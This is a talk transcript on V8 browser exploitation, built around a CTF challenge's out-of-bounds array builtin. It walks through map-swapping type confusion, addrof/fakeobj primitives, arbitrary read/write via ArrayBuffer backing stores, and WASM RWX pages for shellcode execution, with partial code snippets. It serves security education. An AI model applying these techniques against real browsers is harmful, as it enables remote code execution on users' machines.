Welcome to my Ted Talk about Browser Exploitation. I did this because Luke linked me an article about a Dota browser exploitation vulnerability which interested me.
Also find cats in my slides.
–
Today I will be talking about
- Browser Components and Architecture
- JavaScript Engine Internals
- Identifying Vulnerabilities in Patches
- Exploiting Memory Corruption Vulnerabilities
–
To exploit browsers we first need to understand how modern day Web Browsers work. The diagram provides a high level view of browser architecture.
To start off we have the user interface, which is the top bar of the browser that users can control.
Then we have the browser engine, which marshals actions between the UI and rendering engine. It handles the interactions from the user interface, such as clicking links, submitting forms, scrolling the page etc. It also enforces security policies such as Same-Origin Policy.
The rendering engine is responsible for parsing the HTML, CSS and XML to display the webpage. It parses HTML using a tokenization algorithm, while CSS and scripts are parsed via top-down or bottom-up parsing. The main rendering engines are Blink (Chrome), WebKit (Safari) and Gecko (Firefox).
There is also networking, which handles the communication to retrieve resources from other servers.
The JavaScript engine reads and executes JavaScript code and sends the result to the rendering engine. There are various flavours, including V8 for Chrome, SpiderMonkey for Firefox and JavaScriptCore (also known as Nitro) for Safari. This will be our main focus today.
The browser engine also interacts with data persistence which includes various web storage APIs such as localStorage and FileSystem to store data locally.
Finally, there is the UI backend, or platform integration layer, which serves as a bridge between the browser and the underlying operating system. It renders the actual user interface and provides access to system resources, UI controls and system-level APIs.
–
To provide a more stable and secure experience to users, browsers implemented a multi-process architecture. Chrome, for example, has a main browser process, a GPU process, and a dedicated process for each tab, extension and cross-site frame (with site isolation).
The first goal of a multi-process architecture is stability: if the browser ran as a single process, with all the web content, extensions and rendering in one place, a crash in any component would take down the entire browser. The second goal is security: isolating processes via sandboxing helps ensure that malicious web content cannot access sensitive resources.
–
JavaScript engines comprise a parser, an interpreter and one or more optimising compilers. SpiderMonkey, ChakraCore and JSC have variations with multiple optimising compilers.
JavaScript source code is first parsed into an Abstract Syntax Tree. This is then compiled into bytecode, which is executed by the interpreter.
–
The engine keeps track of the code running through the interpreter (known as profiling) to determine warm and hot areas of code, meaning code segments that are run many times. Hot code is compiled into optimised machine code based on what the profiler observed. If those assumptions later turn out to be wrong, the code is deoptimised and execution falls back to the bytecode.
–
In V8, for example, the interpreter is called Ignition, the non-optimising compiler is called Sparkplug, and the optimising compiler is known as TurboFan.
–
JavaScript Engine Internals
Before we look at memory corruption vulnerabilities, I will explain some JavaScript engine concepts.
There are three kinds of values that V8 commonly stores in memory: floating point doubles, SMIs (small integers) and pointers.
V8 uses a pointer tagging mechanism, which basically means using the least significant bit of a value to tell the two apart: a “1” identifies a pointer and a “0” identifies an SMI.
In traditional 32-bit architecture, a small integer would have a 31-bit value followed by a “0” bit, while a pointer would have an address with the lowest bit set to “1”.
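As a rough illustration of the tagging scheme just described, here is a toy model in JavaScript. It is a sketch, not V8 source: the helper names (tagSmi, untagSmi, tagPointer, isSmi) and the example address are made up for this example.

```javascript
// Toy model of 32-bit pointer tagging (illustrative only, not V8 code).
// An SMI keeps its 31-bit payload in the upper bits and a 0 in the lowest bit.
const tagSmi = (value) => (value << 1) | 0;
// An arithmetic shift right removes the tag and keeps the sign.
const untagSmi = (word) => word >> 1;
// A pointer is an aligned address with the lowest bit set to 1.
const tagPointer = (address) => (address | 1) >>> 0;
// The lowest bit alone tells the two kinds of value apart.
const isSmi = (word) => (word & 1) === 0;

const smiWord = tagSmi(21);
const ptrWord = tagPointer(0x08001000); // hypothetical heap address

console.log(smiWord.toString(2), isSmi(smiWord));  // payload bits, then a 0 tag bit
console.log(ptrWord.toString(16), isSmi(ptrWord)); // address with the low bit set
```

This is also why a debugger shows heap pointers as odd numbers: the real address is the displayed value minus one.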
–
Back in 2014 Chrome switched from being a 32-bit process to a 64-bit process, to improve security and efficiency.
A 64-bit architecture still requires pointer tagging in the least significant bit. However, the extra bits allowed SMIs to have 32 bits of value instead of 31 bits.
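A small sketch of the 64-bit case, assuming the layout used by V8 builds without pointer compression, where the 32-bit SMI payload sits in the upper half of the word. The helper names are made up for this example.

```javascript
// Toy model of SMI tagging on 64-bit (assumed layout: payload in the upper 32 bits).
const tagSmi64 = (value) => BigInt.asUintN(64, BigInt(value) << 32n);
// Reinterpret as signed before shifting so negative SMIs survive the roundtrip.
const untagSmi64 = (word) => Number(BigInt.asIntN(64, word) >> 32n);
// The lowest bit is still the tag: 0 for an SMI, 1 for a pointer.
const isSmi64 = (word) => (word & 1n) === 0n;

const lengthWord = tagSmi64(2);
console.log("0x" + lengthWord.toString(16).padStart(16, "0"));
console.log(untagSmi64(lengthWord), isSmi64(lengthWord));
```

Under this assumption, an array length of 2 appears in a memory dump as 0x0000000200000000 rather than as 2.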
–
Eventually in 2020, pointer compression was introduced, which stores tagged values as 32 bits on 64-bit architecture to address memory inefficiencies.
The upper 32 bits of every address inside the V8 heap are the same, so they are kept only once as the isolate root, which is the base of the V8 heap memory space. To rebuild a full pointer, the isolate root stored in the root register is simply added to the compressed 32-bit address stored in the V8 heap.
This is just good to know, but pointer compression is not needed for the memory corruption vulnerability today.
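The decompression step is plain addition, which a few lines of JavaScript can show. The isolate root and the compressed value below are hypothetical numbers chosen for illustration.

```javascript
// Sketch of pointer decompression: full address = isolate root + 32-bit value.
const isolateRoot = 0x0000123400000000n; // hypothetical 4 GB-aligned heap base
const compressed = 0x0804a5c1n;          // hypothetical tagged 32-bit pointer

const decompress = (root, value32) => root + value32;
// Compression just keeps the lower 32 bits.
const compress = (fullAddress) => fullAddress & 0xffffffffn;

const full = decompress(isolateRoot, compressed);
console.log("0x" + full.toString(16));
console.log("0x" + compress(full).toString(16));
```

Because only the lower 32 bits are stored, a corrupted compressed pointer can only ever point somewhere inside the same 4 GB region.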
–
In JavaScript there are hidden classes, otherwise known as maps or shapes.
JavaScript objects are essentially dictionaries that map string keys to values, along with their respective property attributes. For example, in the bottom right image we have the string key “x” mapped to the value 5, and “y” mapped to the value 6.
Besides the value itself, there are some additional property attributes:
- [[Writable]] determines whether the property can be reassigned
- [[Enumerable]] determines whether the property shows up in for-in loops
- [[Configurable]] determines whether the property can be deleted or have its attributes changed
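These attributes can be inspected and set from plain JavaScript using the standard Object.getOwnPropertyDescriptor and Object.defineProperty functions. The object and property names below are just examples.

```javascript
// Inspecting property attributes with standard reflection APIs.
const point = { x: 5, y: 6 };
const xDescriptor = Object.getOwnPropertyDescriptor(point, "x");
console.log(xDescriptor); // properties created by a literal have all attributes true

// Define a property with every attribute switched off.
Object.defineProperty(point, "hidden", {
  value: 7,
  writable: false,
  enumerable: false,
  configurable: false,
});

const enumerated = [];
for (const key in point) enumerated.push(key); // skips non-enumerable keys

const wasWritten = Reflect.set(point, "hidden", 8);         // refused: not writable
const wasDeleted = Reflect.deleteProperty(point, "hidden"); // refused: not configurable
console.log(enumerated, wasWritten, wasDeleted, point.hidden);
```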
–
Similarly, JavaScript arrays are objects with string key indices that begin from “0”. An array can hold at most 2^32-1 elements.
They also have the length key, which automatically updates when new values are added to the array. This property is writable, but it cannot be enumerated or configured.
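Both points can be checked directly in any JavaScript shell. The array contents are arbitrary.

```javascript
// Array indices are string keys, and length is a special own property.
const letters = ["a", "b"];
const indexKeys = Object.keys(letters); // indices come back as strings
const lengthDescriptor = Object.getOwnPropertyDescriptor(letters, "length");

letters[2] = "c"; // adding an element updates length automatically

console.log(indexKeys);
console.log(lengthDescriptor);
console.log(letters.length);
```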
–
JavaScript programs tend to create many objects that share the same arrangement of property keys, so the number of distinct arrangements is small compared to the number of objects. If each object stored all of its property keys and attributes itself, this would be greatly inefficient.
In this example we define two objects that have the same “shape”, because they have identical property keys in the same order.
–
Every JSObject and JSArray therefore references a “map” or “shape”, which in turn holds the property information and provides an offset for retrieving the correct data from memory. Multiple objects can reference the same “map”.
As we will see later, controlling the “map” of an object can lead to significant consequences.
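To make the idea concrete, here is a toy model of shapes written in JavaScript. It only imitates the concept: the names (shapeCache, getShape, makeObject, getProperty) are invented for this sketch and real engines store far more in a map.

```javascript
// Toy model of hidden classes: shapes are shared, objects only hold values.
const shapeCache = new Map();

function getShape(keys) {
  const id = keys.join(","); // good enough as a cache key for this toy
  if (!shapeCache.has(id)) {
    // A shape maps each property key to the slot offset of its value.
    shapeCache.set(id, new Map(keys.map((key, offset) => [key, offset])));
  }
  return shapeCache.get(id);
}

function makeObject(props) {
  const keys = Object.keys(props);
  return { shape: getShape(keys), slots: keys.map((key) => props[key]) };
}

function getProperty(object, key) {
  const offset = object.shape.get(key); // look up the offset in the shape
  return offset === undefined ? undefined : object.slots[offset];
}

const first = makeObject({ x: 5, y: 6 });
const second = makeObject({ x: 7, y: 8 });
const reordered = makeObject({ y: 1, x: 2 });

console.log(first.shape === second.shape);    // same keys, same order: shared
console.log(first.shape === reordered.shape); // different order: different shape
console.log(getProperty(second, "y"));
```

In this model the shape alone decides how the raw slots are interpreted, which is why swapping an object's shape for another one changes the meaning of the same data.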
–
V8 is open source, so we can create a testing environment quite easily. We can retrieve the V8 code and build it using Google’s depot_tools, which is a set of scripts for interacting with the Chromium source repositories.
We can leverage these commands to build a release and a debug version of d8, which is the developer shell (REPL) for V8.
Debug has more symbols, more debugging features and more verbose output.
Release is the optimised build, as shipped to users.
–
Identifying Vulnerabilities in Patches
One of the methods of discovering vulnerabilities in the V8 engine is to look through diff patches. For the presentation I will use an example from a CTF challenge where an out of bounds memory corruption bug is introduced as a built-in function in V8.
The diff patch has two interesting changes. The first is a modification of the bootstrapper.cc file calling SimpleInstallFunction.
–
The second is a new built-in function, BUILTIN(ArrayOob), introduced in the builtins-array.cc file.
–
Built-in functions in V8 can be JavaScript functions or runtime functions in C++.
Runtime functions have a % prefix, such as %DebugPrint, which is used for debugging JavaScript code by printing the internal representation of an object or value to the console. We can enable this later in d8 using the “--allow-natives-syntax” flag.
–
SimpleInstallFunction is a C++ helper used in bootstrapper.cc to install a new built-in function on an object. It accepts:
- an isolate, which is the current instance of the V8 engine
- proto, which is the prototype object that the new function will be added to
- “oob”, the name of the function, and some other interesting values
–
Now we can take a look at the builtins-array.cc file. This is the function that is called when the “oob” function is invoked.
First we set the unsigned 32-bit integer len to the number of arguments provided to the function. If the number of arguments exceeds two, the function returns undefined.
Then we obtain a JSReceiver, which is the base class for JSObjects/JSArrays, by converting the receiver to an object via the Object::ToObject function.
–
The receiver object is then cast to a JSArray, and the elements of the array are cast to a FixedDoubleArray, which is a fixed-size array of double-precision floating point numbers. The array length is also read into a variable.
–
If only one argument is provided, elements.get_scalar(length) retrieves the floating point number at index length. This essentially “reads” at the location array[length].
–
If two arguments are provided (more than two is already rejected by the earlier check), the second argument is converted to a number. That value is then written to array[length], and the function returns undefined.
–
The issue with the code is that arrays in JavaScript are zero-indexed, so the last valid index is length - 1, but the function allows read and write of array[length]. The first argument passed to a built-in is always the receiver, “this”. As such, if we call array.oob() with no explicit arguments we can read the value in memory directly after the last element, and if we pass a floating point value we can overwrite that value.
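The off-by-one can be imitated in ordinary JavaScript with a flat list standing in for memory. This is a simulation only: the slot labels are placeholders, and the layout (array header directly after the elements) is an assumption of this sketch.

```javascript
// Simulation of the off-by-one. "memory" is a flat list of 64-bit slots.
const memory = [
  "elements_map", 2, 1.1, 2.2,                    // elements store: map, length, e[0], e[1]
  "jsarray_map", "properties", "elements_ptr", 2, // header of the array object itself
];
const ELEMENTS_START = 2; // slot of e[0]
const length = 2;

// A correct accessor rejects index === length.
function get(index) {
  if (index < 0 || index >= length) return undefined;
  return memory[ELEMENTS_START + index];
}

// The buggy builtin uses length itself as the index.
// Here args excludes the receiver, so 0 args means read and 1 arg means write.
function oob(...args) {
  if (args.length > 1) return undefined;
  if (args.length === 0) return memory[ELEMENTS_START + length];
  memory[ELEMENTS_START + length] = args[0];
  return undefined;
}

const beforeWrite = oob(); // reads one slot past the last element
oob("attacker_map");       // overwrites that same slot
console.log(get(2), beforeWrite, memory[4]);
```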
–
Exploiting Memory Corruption Vulnerabilities
So by leveraging the vulnerability we can read and write the memory directly after the elements of an array. But what is actually after an array? We can use a debugger to find out.
–
We can start GDB attaching to D8, and then run the REPL and allow native syntax so that we can use runtime functions. Then we can define an array with 2 elements for our example.
–
Using %DebugPrint we can investigate what a JSArray consists of. Here we see some interesting values: “map”, “prototype”, “elements” etc.
–
As there is too much information, we can instead use the GDB “x” command to print the next four 64-bit hex values. However, we have to account for pointer tagging by subtracting 1 from the memory address. The output is read from left to right.
Comparing to the %DebugPrint output, we can determine that the first value of the JSArray is a pointer to the map or shape, then properties, elements, and then an SMI value of 2, representing the length (or number) of elements in the array.
We can follow the elements pointer in memory since we want to find out where the memory points to after the last element.
–
This time, let’s print out the next ten 64-bit hex values. The memory addresses are as follows:
We start with a pointer to the elements map, followed by the SMI (small integer) of 2, then two floating point values that we initially defined.
We realise that the value in memory directly after the elements array is actually the map of the JSArray, which is also the value that our vulnerability can read and write.
–
Just to double check, we can use %DebugPrint to find the location of the JSArray, use the GDB “x” command to find the map value, and then compare it to the value returned by array.oob(), with its floating point value converted to hex.
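Converting between a floating point value and its raw 64-bit pattern is usually done with two typed arrays that share one buffer. The helper names ftoi, itof and hex are a common convention in write-ups, not something built into JavaScript.

```javascript
// Reinterpret a double as a 64-bit integer and back via a shared buffer.
const conversionBuffer = new ArrayBuffer(8);
const floatView = new Float64Array(conversionBuffer);
const intView = new BigUint64Array(conversionBuffer);

function ftoi(value) { // float to integer bit pattern
  floatView[0] = value;
  return intView[0];
}

function itof(bits) { // integer bit pattern to float
  intView[0] = bits;
  return floatView[0];
}

const hex = (bits) => "0x" + bits.toString(16).padStart(16, "0");

console.log(hex(ftoi(1.1)));       // 0x3ff199999999999a
console.log(itof(ftoi(2.2)));      // 2.2
console.log(hex(ftoi(1.1) - 1n));  // same value with a tag bit subtracted
```

With helpers like these, the float returned by the out-of-bounds read can be printed as hex and compared against the GDB output.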
–
So we can control the map of an array, which is the “shape” of an object. What can we do with it? We can potentially leak memory addresses and achieve arbitrary code execution using what is known as “JavaScript Array Type Confusion”.
–
JavaScript Array Type Confusion
Arrays are dynamically typed in JavaScript, which means the types of their elements can change at runtime. If an attacker can make the engine misinterpret the types of the elements in an array, this can be leveraged to execute malicious code.
Hypothetically, we create two arrays A and B, with A as an array of floating point numbers and B as an array of objects.
–
We can leverage the out of bounds read vulnerability to obtain the maps of the two arrays, as defined by A_map and B_map.
–
We can then swap these maps using the out of bounds write, thereby causing type confusion in these arrays.
–
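Reading the first element of the object array while it carries the float map returns the memory address of the stored JavaScript object as a floating point value. This is known as the “addrof” primitive.
Reading the first element of the float array while it carries the object map makes the engine treat a floating point value we chose as an object pointer, giving us a fake object at a location we know. This is known as the “fakeobj” primitive.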
–
I have written a small example snippet of what an “addrof” and “fakeobj” primitive looks like. Due to time constraints we will carry on.
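For reference, the two primitives are commonly written along the following lines. This is a sketch that assumes the patched CTF build, where arrays have the oob() method. On a stock engine the method does not exist, so makePrimitives() simply returns null. All names here are illustrative.

```javascript
// Sketch of addrof/fakeobj. Only functional on the patched d8 with Array.prototype.oob.
const scratch = new ArrayBuffer(8);
const scratchFloat = new Float64Array(scratch);
const scratchInt = new BigUint64Array(scratch);
function ftoi(value) { scratchFloat[0] = value; return scratchInt[0]; }
function itof(bits) { scratchInt[0] = bits; return scratchFloat[0]; }

function makePrimitives() {
  if (typeof Array.prototype.oob !== "function") return null; // stock engine

  const floatArr = [1.1, 2.2];
  const objArr = [{ a: 1 }];
  const floatMap = floatArr.oob(); // leak both maps with the out-of-bounds read
  const objMap = objArr.oob();

  function addrof(object) {
    objArr[0] = object;
    objArr.oob(floatMap);      // object array now read as raw doubles
    const leaked = objArr[0];
    objArr.oob(objMap);        // restore the original map
    return ftoi(leaked);
  }

  function fakeobj(address) {
    floatArr[0] = itof(address);
    floatArr.oob(objMap);      // double is now treated as an object pointer
    const fake = floatArr[0];
    floatArr.oob(floatMap);    // restore the original map
    return fake;
  }

  return { addrof, fakeobj, floatMap, objMap };
}

const primitives = makePrimitives();
console.log(primitives === null ? "oob() not available in this engine" : "primitives ready");
```

Restoring the map after each use matters, because leaving an array with the wrong map tends to crash the engine on the next access or garbage collection.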
–
So now we have the “addrof” and “fakeobj” primitives. We can leverage these primitives to gain arbitrary read and write in memory.
–
Arbitrary Memory Read
Firstly, it’s important to know a special characteristic in JavaScript: accessing an object that is an element of an array does not just provide the object’s address. The engine follows the address, parses the object and returns the result.
Here we define a simple object with a string key “a” and a value of 1. This is then the first element of a JSArray obj_arr. When we use the %DebugPrint function, which coincidentally gives us the same address as the “addrof” primitive would, it returns the parsed object.
–
So let’s recap. Counting in 64-bit words, the map of the JSArray is at offset + 0 and the elements pointer is at offset + 2.
If we then follow the elements pointer, we see that the element values, which we control, begin at offset + 2 of the elements store and continue for as many elements as we have.
A simplified diagram would look like the image below.
–
What we can do is place the map of a float array in the first element of an array we control, so that the memory starting at that element can be treated as a fake floating point array.
In this example, we create a float_arr with four elements, and place its map in the first element of the exploit_arr.
–
We can then create the fake object using our “fakeobj” primitive at the address of the JSArray - 0x20, which is where its first element lives, and place the arbitrary memory address we want to read in the third element of the array, where the fake object expects its elements pointer.
Finally, we can just read the first element of the newly created fake object. The engine follows the fake elements pointer and returns the value stored at our chosen address.
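The address arithmetic behind this can be worked through without any engine bug. The sketch below assumes 8-byte slots, a four-element array whose elements sit directly before its header, and a two-slot elements header (map and length). The function name and all addresses are made up.

```javascript
// Address arithmetic for the fake object (pure computation, hypothetical addresses).
const SLOT = 8n; // bytes per 64-bit slot

function fakeObjectLayout(exploitArrAddress, elementCount, targetAddress) {
  // Element 0 sits elementCount slots below the array header: 4 * 8 = 0x20.
  const fakeObjectAddress = exploitArrAddress - BigInt(elementCount) * SLOT;
  // An elements store has a two-slot header before its first value, so the
  // fake elements pointer must sit 0x10 below the target, with the tag bit set.
  const fakeElementsPointer = (targetAddress | 1n) - 2n * SLOT;
  return { fakeObjectAddress, fakeElementsPointer };
}

const layout = fakeObjectLayout(0x2a4c0d8e1f31n, 4, 0x7ffff7a00000n);
console.log("fake object at   0x" + layout.fakeObjectAddress.toString(16));
console.log("elements pointer 0x" + layout.fakeElementsPointer.toString(16));
```

Reading index 0 of a fake array built this way would then return the 8 bytes stored at the target address.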
–
Arbitrary Write
The same principle can be used to create an arbitrary write primitive. We can create the fake object, and replace the third element with the address we want to write to.
Then we can overwrite the value by assigning to the first element of the fake object.
–
There is an issue though: attempting to overwrite certain memory regions results in a segmentation fault.
I’m not too sure why, but it could be a memory protection mechanism. Even so, more modern V8 engines are not affected by this technique as-is because of pointer compression.
Remember that the upper 32 bits come from the V8 isolate root and are added to the compressed SMI or pointer, meaning that only memory in the V8 heap is accessible.
–
The classic route of circumventing this is to use ArrayBuffers and DataView objects.
We need to overwrite the backing store of an ArrayBuffer to gain arbitrary write.
–
So what are they?
The ArrayBuffer object is used to represent a raw binary data buffer in JavaScript. This is otherwise known as a byte array. The ArrayBuffer object contains a pointer to a backing store, which is the location where the values are stored.
A DataView object is used to directly manipulate the ArrayBuffer and perform read and write operations against it. It is generally used for binary formats such as PNG.
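In normal use the two objects work together like this. The example uses only standard ArrayBuffer, DataView and Uint8Array calls, and the values written are arbitrary.

```javascript
// Ordinary ArrayBuffer + DataView usage.
const buffer = new ArrayBuffer(8); // 8 raw bytes, initially zero
const view = new DataView(buffer);

view.setUint32(0, 0xdeadbeef, true); // write 4 bytes, little-endian
view.setUint8(4, 0x41);              // write a single byte

const rawBytes = Array.from(new Uint8Array(buffer));
const dump = rawBytes.map((byte) => byte.toString(16).padStart(2, "0")).join(" ");

console.log(dump);                                  // ef be ad de 41 00 00 00
console.log(view.getUint32(0, true).toString(16));  // deadbeef
```

Every read and write goes through the backing store pointer, which is why redirecting that pointer turns a DataView into a tool for accessing arbitrary memory.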
–
We can create a new ArrayBuffer + DataView object, find the location of the ArrayBuffer and then overwrite the backing store, which is conveniently located at Offset + 0x20.
–
By doing so, we can then replace the backing store with an arbitrary address, and then use the dataview object to overwrite the value at the arbitrary address, effectively creating an arbitrary write primitive.
–
Arbitrary Code Execution
Once we have the arbitrary read and write primitives we can leverage WebAssembly pages to gain arbitrary code execution.
WebAssembly is a low level binary format that is designed to be executed in web browsers. This generally allows for higher performance.
WebAssembly memory is allocated with permissions, and usually this is “RW”, meaning read and write. If we create a WebAssembly function whose compiled code is placed in a page with “RWX” permissions, as happens in this version of V8, we can leverage the out of bounds vulnerability to disclose the location of that page and write into the memory.
–
Firstly, we generate the WASM code and a code buffer. The code can be anything; it just has to be a valid module.
This creates the wasm_instance, which contains an exports object that holds the functions and global variables from the WebAssembly module.
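A minimal version of this step looks as follows. The module below is a hand-assembled placeholder that exports one function, main, returning 42. It is not the module from the slides, and the variable names are illustrative.

```javascript
// Minimal WebAssembly module: exports main(), which returns the constant 42.
const wasmCode = new Uint8Array([
  0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,             // magic "\0asm", version 1
  0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f,                   // type section: () -> i32
  0x03, 0x02, 0x01, 0x00,                                     // function section: one function of type 0
  0x07, 0x08, 0x01, 0x04, 0x6d, 0x61, 0x69, 0x6e, 0x00, 0x00, // export section: "main" = function 0
  0x0a, 0x06, 0x01, 0x04, 0x00, 0x41, 0x2a, 0x0b,             // code section: i32.const 42; end
]);

const wasmModule = new WebAssembly.Module(wasmCode);
const wasmInstance = new WebAssembly.Instance(wasmModule);
const main = wasmInstance.exports.main;

console.log(Object.keys(wasmInstance.exports)); // [ 'main' ]
console.log(main());                            // 42
```

What the function does is irrelevant for the exploit. Instantiating it is what causes the engine to allocate a page for the compiled code.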
–
In order to find the location to place shellcode, we need to find the base address of the RWX memory space, a pointer to which is stored at a fixed offset from the wasm_instance.
We can use the “addrof” primitive to read the memory address of that object.
–
We can also use “info proc mappings” or “vmmap” to reveal the mapped address spaces, and correlate it to our wasm_instance address.
–
Then we can use JavaScript magic to find the correct offset. In this case it is 0x88.
–
Putting it all together in a script we can place the WASM code first.
–
Then we can find the location to place shellcode, which is the base address of the RWX memory location we just discovered.
–
We can then write the shellcode using our arbitrary write primitive. The shellcode is written through the DataView object as a series of 32-bit unsigned integers.
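The copy loop itself is ordinary DataView code. The sketch below writes into a normal ArrayBuffer, which stands in for the buffer whose backing store would have been redirected. The payload words are filler values, not real shellcode, and copyWords is a made-up helper name.

```javascript
// Copying a payload word by word through a DataView (harmless stand-in buffer).
const payloadWords = new Uint32Array([0x90909090, 0x90909090, 0xcccccccc]); // filler only
const standInBuffer = new ArrayBuffer(payloadWords.length * 4);
const writer = new DataView(standInBuffer);

function copyWords(dataView, words) {
  for (let i = 0; i < words.length; i++) {
    // Each word takes 4 bytes. Little-endian matches x86-64 byte order.
    dataView.setUint32(4 * i, words[i], true);
  }
}

copyWords(writer, payloadWords);
const written = Array.from(new Uint8Array(standInBuffer));
console.log(written.map((byte) => byte.toString(16)).join(" "));
```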
–
We can then insert our shellcode (in this case, it just spawns /bin/sh), copy the shellcode to the base address and then execute it.
–
As shown here.
–
- https://blog.infosectcbr.com.au/2020/02/pointer-compression-in-v8.html
- https://jhalon.github.io/chrome-browser-exploitation-1/
- https://dev.to/mahmoudessam/the-architecture-of-web-browsers-1o1k
- https://liveoverflow.com/webkit-regexp-exploit-addrof-walk-through-browser-0x04/
- https://visualgdb.com/gdbreference/commands/x
- https://v8.dev/blog/pointer-compression
- https://v8.dev/docs/builtin-functions
- https://sensepost.com/blog/2020/intro-to-chromes-v8-from-an-exploit-development-angle/
- https://web.stanford.edu/class/archive/cs/cs107/cs107.1196/lab7/
- https://wasdk.github.io/WasmFiddle/
- https://xz.aliyun.com/t/5003
- https://blog.logrocket.com/how-javascript-works-optimizing-the-v8-compiler-for-efficiency/
- https://medium.com/web-god-mode/how-web-browsers-work-behind-the-scene-architecture-technologies-and-internal-working-fec601488bfa
- https://v8.dev/blog/fast-properties
- https://thepwnish3r.github.io/2021/11/22/Browser-Exploitation-for-n00bs.html
- https://chat.openai.com/chat
- https://www.freebuf.com/vuls/203721.html
- https://faraz.faith/2019-12-13-starctf-oob-v8-indepth/
–
And that’s it. Thanks for listening!
